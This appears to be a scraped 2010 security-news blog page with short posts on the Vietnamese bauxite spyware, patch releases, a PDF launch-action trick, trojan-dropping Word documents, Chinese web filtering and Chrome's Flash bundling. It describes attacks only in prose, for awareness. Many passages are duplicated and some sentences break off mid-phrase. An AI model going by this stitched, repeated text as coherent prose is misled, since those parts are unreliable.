Spyware/DDoS malware combo
Google’s security team member Neel Mehta has blogged about yet one more spyware attack on Google users from Asia. This time forces in Vietnam apparently are trying to spy on and stifle dissent from those opposed to the expansion of bauxite mining in the country’s central highlands. The dissenters are opposed to the environmental impact, the involvement of Chinese in the venture and the displacement of people who live in the mining area. Bauxite is the ore that aluminum is extracted from.
Chinese attempts to spy on dissident’s Gmail accounts made headlines in January. At that time, Google said it would pull its operations out of China because of a wave of hack attacks from China on it and more than 30 other companies, mostly in Silicon Valley. The attacks were largely based on spear phishing and exploited an Adobe .pdf vulnerability to plant Trojans. An investigation by Google showed that the attackers were trying to download information from the Gmail accounts of Chinese dissidents and steal source code.
The malcode that Google just found infects Vietnamese language keyboard software that has been downloaded worldwide. Mehta says the spyware also is capable of participating in distributed denial of service attacks against bloggers opposed to the mining.
Mehta advised those who think they may be infected to run scans on their machines since the malcode is in the detections of leading AV vendors.
“New technology like our suspicious account activity alerts in Gmail should also help detect surveillance efforts. At a larger scale, we feel the international community needs to take cybersecurity seriously to help keep free opinion flowing,” he said.
Google Security Blog here.
Popular Posts
Wednesday, March 31, 2010
Apple issues mega patch for Mac OS X
Apple has issued Security Update 2010-002 (Mac OS X v10.6.3) that fixes 100 enumerated vulnerabilities in:
-- Mac OS X 10.5
-- Mac OS X 10.6
-- Mac OS X Server 10.5
-- Mac OS X Server 10.6
The 400 MB+ download takes a while, so, be prepared.
Info here: http://support.apple.com/kb/HT4077
-- Mac OS X 10.5
-- Mac OS X 10.6
-- Mac OS X Server 10.5
-- Mac OS X Server 10.6
The 400 MB+ download takes a while, so, be prepared.
Info here: http://support.apple.com/kb/HT4077
Forbes: "It's all just Malware now"
It seems I prompted an exploration of infection related search terms in Google Trends over on the Forbes.com Firewall blog. “Malware” is becoming a sort of catch-all term for end-users, slowly replacing the various types of Ad/Mal/Spyware classifications.
Article here – worth checking out the comment by Andy Hayter, Anti-Malcode Program Manager of ICSA Labs, too. Of course, I like to think I might have contributed in some small way to certain search terms going the way of the Dinosaur...
Article here – worth checking out the comment by Andy Hayter, Anti-Malcode Program Manager of ICSA Labs, too. Of course, I like to think I might have contributed in some small way to certain search terms going the way of the Dinosaur...
Running executables in PDF: it’s a feature
Didier Stevens, security professional and blogger, has found a “feature” in the PDF file format that makes it possible to package an executable in a PDF file which will run in Foxit PDF reader or run in Adobe Reader with a bit of social engineering.
“With Adobe Reader, the only thing preventing execution is a warning. Disabling JavaScript will not prevent this (I don’t use JavaScript in my PoC PDF), and patching Adobe Reader isn’t possible (I’m not exploiting a vulnerability, just being creative with the PDF language specs).”
“…preventing Adobe Reader from creating new processes blocks this trick,” he said.
“In this case, Foxit Reader is probably worse than Adobe Reader, because no warning gets displayed to prevent the launch action. My PoC PDF requires some changes for Foxit Reader, because ultimately, the executable doesn’t run. But that’s probably due to some variation in the PDF language supported by Foxit Reader.”
Stevens has made available a proof-of-concept sample and said he notified Adobe’s product security incident response team.
Until this is solved, it would be a good idea to READ any notification that pops up when you open a PDF file and DO NOT let yourself be social engineered into disregarding warnings about launching executables.
Stevens' blog piece here.
“With Adobe Reader, the only thing preventing execution is a warning. Disabling JavaScript will not prevent this (I don’t use JavaScript in my PoC PDF), and patching Adobe Reader isn’t possible (I’m not exploiting a vulnerability, just being creative with the PDF language specs).”
“…preventing Adobe Reader from creating new processes blocks this trick,” he said.
“In this case, Foxit Reader is probably worse than Adobe Reader, because no warning gets displayed to prevent the launch action. My PoC PDF requires some changes for Foxit Reader, because ultimately, the executable doesn’t run. But that’s probably due to some variation in the PDF language supported by Foxit Reader.”
Stevens has made available a proof-of-concept sample and said he notified Adobe’s product security incident response team.
Until this is solved, it would be a good idea to READ any notification that pops up when you open a PDF file and DO NOT let yourself be social engineered into disregarding warnings about launching executables.
Stevens' blog piece here.
MS out-of-band patch TODAY
MS10–018
If you’re using Internet Explorer versions 6 or 7 it wouldn’t be a good idea to miss this one. “Actively exploited” for drive by down loads from malicious web sites sums it up.
There’s something in it for IE8 as well.
See our post yesterday: “Microsoft out-of-band patch tomorrow”
If you’re using Internet Explorer versions 6 or 7 it wouldn’t be a good idea to miss this one. “Actively exploited” for drive by down loads from malicious web sites sums it up.
There’s something in it for IE8 as well.
See our post yesterday: “Microsoft out-of-band patch tomorrow”
iTunes 9.1 Released: iPad Syncing and iBooks Support Included
The new update doesn’t do anything like radically change the iTunes interface. Instead, it is focused on providing support for the iPad, which launches this Saturday. The big addition in this software update is iPad syncing. Thus if and when you plug that glorious iPad of yours into your computer on Saturday, it’ll sync your computer’s music, movies, books, and other media with your tablet device.
There are a few other additions to iTunes worth noting. Support for iBooks has been included in this software update, providing you the ability to sync books you’ve bought between your iPad and your computer. Finally, there have been some changes to the Genius feature — now you can rename, rearrange, and remove mixes you create via the Genius feature.
In reality, today’s update is all about making sure that the iPad experience goes smoothly on Saturday. By releasing the software early, they can find and remove any final bugs before one of the most important product launches in the company’s history.
File Transfers Coming to Gmail Chat
This is good news for web users with a preference for software-free chatting, but the better news is that Google promises to bring the same functionality to Gmail, which already supports voice, video and group chat.
The iGoogle and Orkut file transfers will work for photos, documents and presumably small video files. In addition, web users can exchange files with users of Google Talk — the more robust desktop version of Google’s chat client — without any hiccups.
We certainly look forward to the day when file transfers will be supported via chat in Gmail, and we’ll update you when we know more. Until then, let us know what you think about the new iGoogle and Orkut functionality in the comments.
Chrome 5 becomes the Flash browser, integrates plug-in with dev build
With Google owning YouTube, the Internet's principal delivery system for Flash-based video, it was perhaps inevitable that the company would bundle the Flash plug-in with its Chrome browser. The announcement came today from both Google and the team developing the open source Chromium component on which Chrome is based.
The move now officially places Google in contention with proponents of HTML 5, who had held out a glimmer of hope for a non-proprietary, non-plug-in video format for the standard's new [VIDEO] element. In its blog post today, the Chromium team indirectly blamed the standards process for not having solved what it perceives as the problem of specifying how plug-ins should operate, and credits Mozilla -- which makes Firefox -- with helping to rectify that issue.
"The traditional browser plug-in model has enabled tremendous innovation on the Web, but it also presents challenges for both plug-ins and browsers," reads today's post from Google Vice President for Engineering Linus Upson. "The browser plug-in interface is loosely specified, limited in capability and varies across browsers and operating systems. This can lead to incompatibilities, reduction in performance and some security headaches."
Upson credits Mozilla's efforts to upgrade and improve the old Netscape plug-in API model, still called NPAPI. This model currently enables out-of-process plug-ins to operate essentially independently from the browser. Historically, it's this independence that has been exploited by malicious users infiltrating victims' systems through Adobe Flash. Under the new system proposed by Mozilla, code-named "Pepper," processes launched through the browser would run through threads that are routed completely independently of browser and renderer threads. Specifically, the new thread model would block browser threads when plug-in threads are active, and vice versa, so that one would never have access to the other.
Consider it a kind of "anti-multithreading" that may very well be necessary in the age of Web applications.
But by citing Mozilla as the leader in this effort, Google may effectively be ceding responsibility for solving some of the most critical Flash security issues to date, to Mozilla. Until then, Upson concedes that the first Chrome dev build to contain the Flash plug-in will not yet have resolved a potential security risk: the separation between the Chrome tab processes and the Flash runtime. Part of Google's (originally) innovative security model was its division of browser tabs into separate processes, so that when one tab crashes, the main browser remains stable.
One of the unanticipated side-effects of this model deals with Chrome's approach to add-ons: They too are separate processes, all of which identify themselves to the operating system as Chrome. The screenshot above shows a list of active processes from Sysinternals' Process Explorer, with the latest Chrome dev build 360.4. There's only one tab running the Acrobat.com page, but note that Chrome appears twice in the list. That second instance appears to be the Chrome sandbox wrapped around the Flash add-on.
But it's not. As Google's Upson said today, despite appearances, the Flash instance which that second item appears to encapsulate is not completely covered by Chrome's sandbox -- its safe operating environment. There's obvious reasons for that: Here, Flash Web apps are hosted in the client by the AIR runtime. There should only be one instance of AIR running within a client.
The reasons why were outlined in a 2008 white paper (PDF available here) written by a trio of university researchers who were employed by Google to design Chromium. It's in "The Security Architecture of the Chromium Browser" that the designers explain the division of the browser kernel, which interacts with the operating system, from the renderer which is isolated in the sandbox. Plug-ins must run independently of the sandbox in order to fulfill the needs of their manufacturers, the group stated, even though doing so introduces a potential vulnerability. Notice which plug-in they picked as their case-in-point:
Users could try running Chromium (and later Chrome), the group suggested, using the command line switch
To address that problem, Adobe's senior director of Flash engineering, Paul Betlem, said in a blog post todaythat his team will work with both Google and Mozilla to replace and improve NPAPI. "While the current NPAPI has served the industry well, it lacks the flexibility and power to support the pace of innovation we see ahead," Betlem wrote. "We expect that the new API specification will offer some distinct benefits over the current technology available."
One foreseeable outcome of this collaboration could very well be a community where at least some plug-ins are compatible with both Chrome and Firefox simultaneously. But another outcome that Adobe's Betlem points to is a certain kind of unification, not just of the security model but of how the browser presents itself to the world. Think of it as "the Flash browser."
"The new API is being designed with the flexibility to allow plug-ins to more tightly integrate with host browsers," wrote Betlem. "The new plug-in API will provide performance benefits since the host browser will be able to directly share more information about its current state."
Reaction to Adobe's and Google's move today was mixed on Google's forums, with about two-thirds of respondents against the bundling and one-third vocally in favor. As supernova_00 wrote this morning, "Ugh. And here I thought we were all getting close(ish) to completely ditching Flash, and you guys decide to bundle Flash with Chrome. What the hell happened to open standards?"
Plus this from contributor Daniel Hansen: "Just when we thought that Google was the champion of HTML 5, they turn around and partner with Adobe on Flash to ensure that the Web remains a mess of proprietary brain damage."
Support for the move centered around the notion that Flash is simply a fact of life on the modern Web that no arbitrarily imposed standard is likely to change overnight, or even in the next decade. "People must be really dumb if they think HTML 5 is going to kill Flash," wrote Gabriel. "It's used for so-o-o much more than cats playing piano. The sooner you realize this, the more Google's move makes sense."
There was also this from contributor Troy: "How is Flash not an open standard? The bytecode format of [Shockwave] SWFs is published. There are open-source tools for producing SWFs. The tool chain is open-source and free. The player is available on the three major desktop OSs, and now on many mobile devices, as well as several video game consoles. Its virtual machine is open-sourced. Sure, it's not standard-certified by some international organization, but neither is HTML 5 (yet) nor is CSS3 (yet). It is a de facto standard, used by more Web sites and users than HTML 5, CSS3, Canvas, etc. Come on, folks, let's be pragmatic."
The bundling of Flash with Chrome does not change the relationship between the component and the browser, as indicated by the
The move now officially places Google in contention with proponents of HTML 5, who had held out a glimmer of hope for a non-proprietary, non-plug-in video format for the standard's new [VIDEO] element. In its blog post today, the Chromium team indirectly blamed the standards process for not having solved what it perceives as the problem of specifying how plug-ins should operate, and credits Mozilla -- which makes Firefox -- with helping to rectify that issue.
"The traditional browser plug-in model has enabled tremendous innovation on the Web, but it also presents challenges for both plug-ins and browsers," reads today's post from Google Vice President for Engineering Linus Upson. "The browser plug-in interface is loosely specified, limited in capability and varies across browsers and operating systems. This can lead to incompatibilities, reduction in performance and some security headaches."
Upson credits Mozilla's efforts to upgrade and improve the old Netscape plug-in API model, still called NPAPI. This model currently enables out-of-process plug-ins to operate essentially independently from the browser. Historically, it's this independence that has been exploited by malicious users infiltrating victims' systems through Adobe Flash. Under the new system proposed by Mozilla, code-named "Pepper," processes launched through the browser would run through threads that are routed completely independently of browser and renderer threads. Specifically, the new thread model would block browser threads when plug-in threads are active, and vice versa, so that one would never have access to the other.
Consider it a kind of "anti-multithreading" that may very well be necessary in the age of Web applications.
But by citing Mozilla as the leader in this effort, Google may effectively be ceding responsibility for solving some of the most critical Flash security issues to date, to Mozilla. Until then, Upson concedes that the first Chrome dev build to contain the Flash plug-in will not yet have resolved a potential security risk: the separation between the Chrome tab processes and the Flash runtime. Part of Google's (originally) innovative security model was its division of browser tabs into separate processes, so that when one tab crashes, the main browser remains stable.
One of the unanticipated side-effects of this model deals with Chrome's approach to add-ons: They too are separate processes, all of which identify themselves to the operating system as Chrome. The screenshot above shows a list of active processes from Sysinternals' Process Explorer, with the latest Chrome dev build 360.4. There's only one tab running the Acrobat.com page, but note that Chrome appears twice in the list. That second instance appears to be the Chrome sandbox wrapped around the Flash add-on.
But it's not. As Google's Upson said today, despite appearances, the Flash instance which that second item appears to encapsulate is not completely covered by Chrome's sandbox -- its safe operating environment. There's obvious reasons for that: Here, Flash Web apps are hosted in the client by the AIR runtime. There should only be one instance of AIR running within a client.
The reasons why were outlined in a 2008 white paper (PDF available here) written by a trio of university researchers who were employed by Google to design Chromium. It's in "The Security Architecture of the Chromium Browser" that the designers explain the division of the browser kernel, which interacts with the operating system, from the renderer which is isolated in the sandbox. Plug-ins must run independently of the sandbox in order to fulfill the needs of their manufacturers, the group stated, even though doing so introduces a potential vulnerability. Notice which plug-in they picked as their case-in-point:
In Chromium's architecture, each plug-in runs in a separate host process, outside both the rendering engines and the browser kernel. In order to maintain compatibility with existing web sites, browser plug-ins cannot be hosted inside the rendering engine because plug-in vendors expect there to be at most one instance of a plug-in for the entire web browser. If plug-ins were hosted inside the browser kernel, a plug-in crash would be sufficient to crash the entire browser.By default, each plug-in runs outside of the sandbox and with the user's full privileges. This setting maintains compatibility with existing plug-ins and web sites because plug-ins can have arbitrary behavior. For example, the Flash Player plug-in can access the user's microphone and webcam, as well as write to the user's file system (to update itself and store Flash cookies). The limitation of this setting is that an attacker can exploit unpatched vulnerabilities in plug-ins to install malware on the user's machine.
Users could try running Chromium (and later Chrome), the group suggested, using the command line switch
--safe-plugins, which would place all plug-ins under the protection of the renderer's sandbox. But they'll likely crash, they warned.To address that problem, Adobe's senior director of Flash engineering, Paul Betlem, said in a blog post todaythat his team will work with both Google and Mozilla to replace and improve NPAPI. "While the current NPAPI has served the industry well, it lacks the flexibility and power to support the pace of innovation we see ahead," Betlem wrote. "We expect that the new API specification will offer some distinct benefits over the current technology available."
One foreseeable outcome of this collaboration could very well be a community where at least some plug-ins are compatible with both Chrome and Firefox simultaneously. But another outcome that Adobe's Betlem points to is a certain kind of unification, not just of the security model but of how the browser presents itself to the world. Think of it as "the Flash browser."
"The new API is being designed with the flexibility to allow plug-ins to more tightly integrate with host browsers," wrote Betlem. "The new plug-in API will provide performance benefits since the host browser will be able to directly share more information about its current state."
Reaction to Adobe's and Google's move today was mixed on Google's forums, with about two-thirds of respondents against the bundling and one-third vocally in favor. As supernova_00 wrote this morning, "Ugh. And here I thought we were all getting close(ish) to completely ditching Flash, and you guys decide to bundle Flash with Chrome. What the hell happened to open standards?"
Plus this from contributor Daniel Hansen: "Just when we thought that Google was the champion of HTML 5, they turn around and partner with Adobe on Flash to ensure that the Web remains a mess of proprietary brain damage."
Support for the move centered around the notion that Flash is simply a fact of life on the modern Web that no arbitrarily imposed standard is likely to change overnight, or even in the next decade. "People must be really dumb if they think HTML 5 is going to kill Flash," wrote Gabriel. "It's used for so-o-o much more than cats playing piano. The sooner you realize this, the more Google's move makes sense."
There was also this from contributor Troy: "How is Flash not an open standard? The bytecode format of [Shockwave] SWFs is published. There are open-source tools for producing SWFs. The tool chain is open-source and free. The player is available on the three major desktop OSs, and now on many mobile devices, as well as several video game consoles. Its virtual machine is open-sourced. Sure, it's not standard-certified by some international organization, but neither is HTML 5 (yet) nor is CSS3 (yet). It is a de facto standard, used by more Web sites and users than HTML 5, CSS3, Canvas, etc. Come on, folks, let's be pragmatic."
The bundling of Flash with Chrome does not change the relationship between the component and the browser, as indicated by the
about:plugins page above. Notice its format changed with this latest dev build; it now includes (highly requested) Disable links that let you turn off plug-ins without uninstalling them. However, bundling Flash did add 2.4 MB to Chrome 5's download size, plus a single new question to the startup procedure (shown below). In the dev build, to start using the Flash plug-in that's distributed with the browser, you run Chrome from the command line, adding the switch --enable-internal-flash.
Tuesday, March 30, 2010
Australian Internet censorship row warms up
There seems to be an established procedure used by government officials who want to censor Internet traffic: begin requiring Google and ISPs to filter pornography then sneak in filtering of the politically sensitive material of your choice.
Maybe we should give this a name: how about “porn filter law bait and switch?”
In China’s Green Dam fiasco last summer, the web filter that was required on new machines (before the whole idea broke down) was supposed to protect good Chinese Internet users from sex and violence. When various researchers took apart the Green Dam files, however, they found that 1.) it ripped off a lot of code from a U.S. company and 2) two thirds of the strings it was set up to filter were politically sensitive words and not sex and violence issues at all.
Australian Communications Minister Stephen Conroy is taking the same tack: He’s furious that Google is opposed to the Internet filtering scheme he’s proposing. It starts with sexually related web sites (which present photos of flat-chested women allegedly preferred by pedophiles), but his blacklist also includes material that would screen discussions of sexual health matters and EUTHANASIA. Conroy is a strong opponent of euthanasia.
Inquirer story here: “Australia attacks Google”
Maybe we should give this a name: how about “porn filter law bait and switch?”
In China’s Green Dam fiasco last summer, the web filter that was required on new machines (before the whole idea broke down) was supposed to protect good Chinese Internet users from sex and violence. When various researchers took apart the Green Dam files, however, they found that 1.) it ripped off a lot of code from a U.S. company and 2) two thirds of the strings it was set up to filter were politically sensitive words and not sex and violence issues at all.
Australian Communications Minister Stephen Conroy is taking the same tack: He’s furious that Google is opposed to the Internet filtering scheme he’s proposing. It starts with sexually related web sites (which present photos of flat-chested women allegedly preferred by pedophiles), but his blacklist also includes material that would screen discussions of sexual health matters and EUTHANASIA. Conroy is a strong opponent of euthanasia.
Inquirer story here: “Australia attacks Google”
EXEs in word docs
Today, our friends at Trend Micro blogged about a new attack vector using Microsoft Word documents. We saw this as well last week, and have written a detection for the dropped trojan.
It’s not just a “lawsuit” that’s being spammed, we also picked up another form of this attack in our honeypots over the weekend:
When you open the Word document, you see a “PDF”, but it’s actually not. It’s a JPG, which links to an executable.
In Word 2007, it’s kind of like the Amish virus: The user has to really want to get infected.
Latest VirusTotal detection here.
It’s not just a “lawsuit” that’s being spammed, we also picked up another form of this attack in our honeypots over the weekend:
When you open the Word document, you see a “PDF”, but it’s actually not. It’s a JPG, which links to an executable.
In Word 2007, it’s kind of like the Amish virus: The user has to really want to get infected.
Latest VirusTotal detection here.
| File COMPLA_1.EXE received on 2010.03.29 23:00:50 (UTC) | |||
| Antivirus | Version | Last Update | Result |
| AntiVir | 7.10.5.248 | 2010.03.29 | TR/Dropper.Gen |
| Avast | 4.8.1351.0 | 2010.03.29 | Win32:Malware-gen |
| Avast5 | 5.0.332.0 | 2010.03.29 | Win32:Malware-gen |
| BitDefender | 7.2 | 2010.03.29 | Trojan.Downloader.JMZC |
| F-Secure | 9.0.15370.0 | 2010.03.30 | Trojan-Downloader:W32/Lapurd.E |
| GData | 19 | 2010.03.29 | Trojan.Downloader.JMZC |
| McAfee+Artemis | 5935 | 2010.03.29 | Artemis!60DF604563A1 |
| McAfee-GW-Edition | 6.8.5 | 2010.03.29 | Trojan.Dropper.Gen |
| Microsoft | 1.5605 | 2010.03.30 | Trojan:Win32/Meredrop |
| Prevx | 3.0 | 2010.03.30 | High Risk Fraudulent Security Program |
| Sophos | 4.52.0 | 2010.03.30 | Sus/UnkPack-C |
| Sunbelt | 6114 | 2010.03.30 | Trojan-Downloader |
| Symantec | 20091.2.0.41 | 2010.03.30 | Backdoor.Trojan |
Improved chat for iGoogle and orkut
Have you ever wanted to quickly send a file to a friend who's online? Now you can share pictures, documents and other files directly with your friends while chatting in iGoogle and orkut, without having to switch to email to send the file as an attachment. File transfer works directly in the browser so you don't need to install anything. Just start a conversation with a friend and click “Send a file...” in the “Actions” menu. After you select a file, your friend will be asked if they want to accept the transfer. You can learn more on the Google Talkabout Blog.
You might have noticed that Google recently gave iGoogle and orkut chat a face lift. Several tools now have a new home at the top of the chat window. From the new toolbar, you can click the blue camera
and phone icons 
to start video and voice chats with your friends or the group chat icon 
to add additional friends to a text chat. If you've never used video or voice chat before, all you need is a webcam and microphone attached to your computer and a small plugin application available for free at www.google.com/chat/video.
Google is working to bring file transfer and the new toolbar to Gmail too. In the meantime, you can continue to access voice, video and group chat in Gmail from the “Video and More” menu in a chat window.
You might have noticed that Google recently gave iGoogle and orkut chat a face lift. Several tools now have a new home at the top of the chat window. From the new toolbar, you can click the blue camera
and phone icons to start video and voice chats with your friends or the group chat icon to add additional friends to a text chat. If you've never used video or voice chat before, all you need is a webcam and microphone attached to your computer and a small plugin application available for free at www.google.com/chat/video.Google is working to bring file transfer and the new toolbar to Gmail too. In the meantime, you can continue to access voice, video and group chat in Gmail from the “Video and More” menu in a chat window.
Test of China Internet connections reveals heavy filtering
Using a Firefox 3.0 add-on created by developers in Hong Kong, Betanews was able to briefly establish a connection with the Internet via a proxy based in mainland China. With that proxy, we were able to confirm that searches performed using Google's Hong Kong-based page were effectively blocked.
Firefox 3.0 reported the blockage with this message: "The connection to the server was reset while the page was loading" -- a message from the browser, not from an ISP. We used version 3.0.16 of Firefox (an older edition) because it is the only version compatible with China Channel, a tool made for the express purpose of testing China's filtering ability. It has not been upgraded for version 3.6.
Further tests using the same proxy connection revealed that filtering may not be limited to Google. Searches for innocuous topics using Baidu, the country's leading search service known to employ its own filtering, were also blocked. We confirmed that the failed Baidu attempts were on account of blockage rather than just a dropped connection by browsing immediately to Xinhuanet, the country's state-run news service.
Our proxy connection lasted for approximately eight minutes before all requests began timing out. During that period, we saw some evidence that, rather than just blocking Google specifically, China ISPs may be using a much broader form of blocking of .com addresses in general, at least with the range of IP addresses under which our successful proxy connection falls.
For example, we could not connect to Baidu's home page using baidu.com. However, we were successful using baidu.cn, an address which, for clients outside China, is redirected to baidu.com anyway. Other .cn addresses were accessible, but betanews.com was not -- and I doubt we draw the attention of Chinese authorities enough to earn a spot on its blacklist.
The proxy IP address from which we were successfully able to establish the connection, should you wish to try this test for yourself, was: 218.14.227.197:3128, which traces to Beijing. Port 3128 is normally associated with proxy servers.
Firefox 3.0 reported the blockage with this message: "The connection to the server was reset while the page was loading" -- a message from the browser, not from an ISP. We used version 3.0.16 of Firefox (an older edition) because it is the only version compatible with China Channel, a tool made for the express purpose of testing China's filtering ability. It has not been upgraded for version 3.6.
Further tests using the same proxy connection revealed that filtering may not be limited to Google. Searches for innocuous topics using Baidu, the country's leading search service known to employ its own filtering, were also blocked. We confirmed that the failed Baidu attempts were on account of blockage rather than just a dropped connection by browsing immediately to Xinhuanet, the country's state-run news service.
Our proxy connection lasted for approximately eight minutes before all requests began timing out. During that period, we saw some evidence that, rather than just blocking Google specifically, China ISPs may be using a much broader form of blocking of .com addresses in general, at least with the range of IP addresses under which our successful proxy connection falls.
For example, we could not connect to Baidu's home page using baidu.com. However, we were successful using baidu.cn, an address which, for clients outside China, is redirected to baidu.com anyway. Other .cn addresses were accessible, but betanews.com was not -- and I doubt we draw the attention of Chinese authorities enough to earn a spot on its blacklist.
The proxy IP address from which we were successfully able to establish the connection, should you wish to try this test for yourself, was: 218.14.227.197:3128, which traces to Beijing. Port 3128 is normally associated with proxy servers.
Back to Basics with Fake AV
We’ve been seeing Fake AV programs getting more convincing for a while now. Some of the tricks employed by the guys behind these rogue programs include Windows-7-style fake scanners, in-browser “scanners”, and program features that ape other aspects of the operating system.
Yesterday, though, we came across a misleading application called AntiVirusDemoFraud that is—how to say?—possibly a little less sophisticated than some in terms of user interface design.
Obvious in the screenshots are the familiar misleading application hallmarks, such as fake detection names, dire warnings as to what the “threats” are capable of, and buttons to pay to register the program and remove the threats. Notable are the errors in spelling and grammar, the “dotted tri” IP address, and the frankly amateurish interface. Don’t give up your day jobs folks.
Yesterday, though, we came across a misleading application called AntiVirusDemoFraud that is—how to say?—possibly a little less sophisticated than some in terms of user interface design.
Obvious in the screenshots are the familiar misleading application hallmarks, such as fake detection names, dire warnings as to what the “threats” are capable of, and buttons to pay to register the program and remove the threats. Notable are the errors in spelling and grammar, the “dotted tri” IP address, and the frankly amateurish interface. Don’t give up your day jobs folks.
Facebook AV
Does a Facebook-specific antivirus application sound like a good idea? Maybe not. One of our analysts saw this particular application claiming to be an antivirus wreak havoc on his Friends list. Of course, there is no such thing.
Once installed on one Friend's account, this application tags 20 Friend into a picture such as the one below:
If a Friend looking through the photos then clicks on the app's (apparently randomly generated) link, they'll see this:
If you have a lot of friends, you might end up with a series of albums like this:
You can find more information about this, including instructions on how to remove the tags on the photos, at FacebookInsider.
Examples include Antivirus in Focebook and F'acebook antivirus.
Notice the misspelling of Facebook in both names. Facebook is already in the process removing and preventing such rogue apps.
Once installed on one Friend's account, this application tags 20 Friend into a picture such as the one below:
If a Friend looking through the photos then clicks on the app's (apparently randomly generated) link, they'll see this:
If you have a lot of friends, you might end up with a series of albums like this:
Examples include Antivirus in Focebook and F'acebook antivirus.
Notice the misspelling of Facebook in both names. Facebook is already in the process removing and preventing such rogue apps.
Microsoft out-of-band patch tomorrow
Microsoft said today it will issue an out-of-band patch tomorrow for a vulnerability in Internet Explorer 6 and 7 that is being actively exploited.
“The vulnerability exists due to an invalid pointer reference being used within Internet Explorer. It is possible under certain conditions for the invalid pointer to be accessed after an object is deleted. In a specially-crafted attack, in attempting to access a freed object, Internet Explorer can be caused to allow remote code execution,” Microsoft said in its Security Advisory 981374 earlier this month.
“In a Web-based attack scenario, an attacker could host a Web site that contains a Web page that is used to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability,” they said.
The vulnerability is enumerated as CVE-2010-0806
Advisory here.
“The vulnerability exists due to an invalid pointer reference being used within Internet Explorer. It is possible under certain conditions for the invalid pointer to be accessed after an object is deleted. In a specially-crafted attack, in attempting to access a freed object, Internet Explorer can be caused to allow remote code execution,” Microsoft said in its Security Advisory 981374 earlier this month.
“In a Web-based attack scenario, an attacker could host a Web site that contains a Web page that is used to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability,” they said.
The vulnerability is enumerated as CVE-2010-0806
Advisory here.
MPEG LA wins major MPEG-2 settlement from Alcatel-Lucent
Could the manufacturers of DVD players (no, not just Blu-ray, but the original DVDs) owe back royalties to Alcatel-Lucent for the use of patented technology by way of the MPEG-2 codec? The MPEG Licensing Authority had asserted that Alcatel may have structured its 2006 merger with Lucent in such a way that it could hide up to five patents in a special trust, and spring their overdue royalties on the video industry long after DVDs already began the march to obsolescence.
That assertion was being made in a Delaware courtroom earlier this month, in a trial pertaining to a lawsuit filed by the MPEG Licensing Authority back in 2007. Today, MPEG LA -- which also collects royalties for the use of MPEG-2 -- announced a settlement in the case, essentially amounting to a complete defeat for Alcatel-Lucent.
The five patents that Alcatel-Lucent had maintained in what it called the Multimedia Patent Trust (MPT), will now be submitted to MPEG LA with the possibility of inclusion in the portfolio it already licenses to manufacturers -- and by "possibility," we mean, virtual certainty.
The settlement brings to a close a dispute which threatened to get ugly, over the intellectual property rights for a relatively old -- and many would argue, antiquated -- way of encoding video. The dispute began when Microsoft, along with computer makers Dell and Gateway (now part of Acer), were first sued by the newly merged entity on behalf of the former Lucent. Alcatel was (and still is) a member of MPEG LA itself, but Lucent was not. At the time, Alcatel-Lucent maintained it set up the trust in order to protect patents from Lucent's old Bell Laboratories portfolio, that it asserted had not been folded into the MPEG-2 Essential Patents portfolio of MPEG LA.
"The MPT was established at the time of the merger in 2006 because Lucent Technologies had certain patents at risk of losing value because of how the merger was structured," reads a statement from Alcatel-Lucent General Counsel Steve Reynolds ten days ago. "To preserve their value over the life of the patents, Lucent created the trust and assigned those patents to it. The trust now owns and controls those assets. Proceeds from the trust go to Alcatel-Lucent and the Alcatel-Lucent Foundation."
At the time the computer and software makers were sued, the total valuation of the suit was estimated at over $2 billion. But even the amount has been a matter of dispute, especially since a San Diego district court judge ruled in 2008 that the patents in this case were essentially...non-essential. That devalued them at the same time it appeared to indicate they did not belong in MPEG LA's "Essential Patents" portfolio.
Referring to a correction that Bloomberg News had to make in a report earlier this month, Alcatel-Lucent's Reynolds added, "Because the San Diego court determined that the patents were not infringed, and therefore were not essential, we do not see how MPEG LA could claim rights to these patents under any circumstances. Our understanding is that MPEG LA claims to have rights to essential patents. By court determination, the MPT patents in the San Diego lawsuit simply don't meet that requirement. That should have been the headline, not a sensational number about a bogus and non-existent risk."
Testimony in the trial was already drawing to a close. In a statement to Betanews this afternoon, MPEG LA said, "The resolution of the case is consistent with the relief MPEG LA sought in its complaint."
That assertion was being made in a Delaware courtroom earlier this month, in a trial pertaining to a lawsuit filed by the MPEG Licensing Authority back in 2007. Today, MPEG LA -- which also collects royalties for the use of MPEG-2 -- announced a settlement in the case, essentially amounting to a complete defeat for Alcatel-Lucent.
The five patents that Alcatel-Lucent had maintained in what it called the Multimedia Patent Trust (MPT), will now be submitted to MPEG LA with the possibility of inclusion in the portfolio it already licenses to manufacturers -- and by "possibility," we mean, virtual certainty.
The settlement brings to a close a dispute which threatened to get ugly, over the intellectual property rights for a relatively old -- and many would argue, antiquated -- way of encoding video. The dispute began when Microsoft, along with computer makers Dell and Gateway (now part of Acer), were first sued by the newly merged entity on behalf of the former Lucent. Alcatel was (and still is) a member of MPEG LA itself, but Lucent was not. At the time, Alcatel-Lucent maintained it set up the trust in order to protect patents from Lucent's old Bell Laboratories portfolio, that it asserted had not been folded into the MPEG-2 Essential Patents portfolio of MPEG LA.
"The MPT was established at the time of the merger in 2006 because Lucent Technologies had certain patents at risk of losing value because of how the merger was structured," reads a statement from Alcatel-Lucent General Counsel Steve Reynolds ten days ago. "To preserve their value over the life of the patents, Lucent created the trust and assigned those patents to it. The trust now owns and controls those assets. Proceeds from the trust go to Alcatel-Lucent and the Alcatel-Lucent Foundation."
At the time the computer and software makers were sued, the total valuation of the suit was estimated at over $2 billion. But even the amount has been a matter of dispute, especially since a San Diego district court judge ruled in 2008 that the patents in this case were essentially...non-essential. That devalued them at the same time it appeared to indicate they did not belong in MPEG LA's "Essential Patents" portfolio.
Referring to a correction that Bloomberg News had to make in a report earlier this month, Alcatel-Lucent's Reynolds added, "Because the San Diego court determined that the patents were not infringed, and therefore were not essential, we do not see how MPEG LA could claim rights to these patents under any circumstances. Our understanding is that MPEG LA claims to have rights to essential patents. By court determination, the MPT patents in the San Diego lawsuit simply don't meet that requirement. That should have been the headline, not a sensational number about a bogus and non-existent risk."
Testimony in the trial was already drawing to a close. In a statement to Betanews this afternoon, MPEG LA said, "The resolution of the case is consistent with the relief MPEG LA sought in its complaint."
It's not dead yet: Microsoft's out-of-band IE6 fix impacts IE8
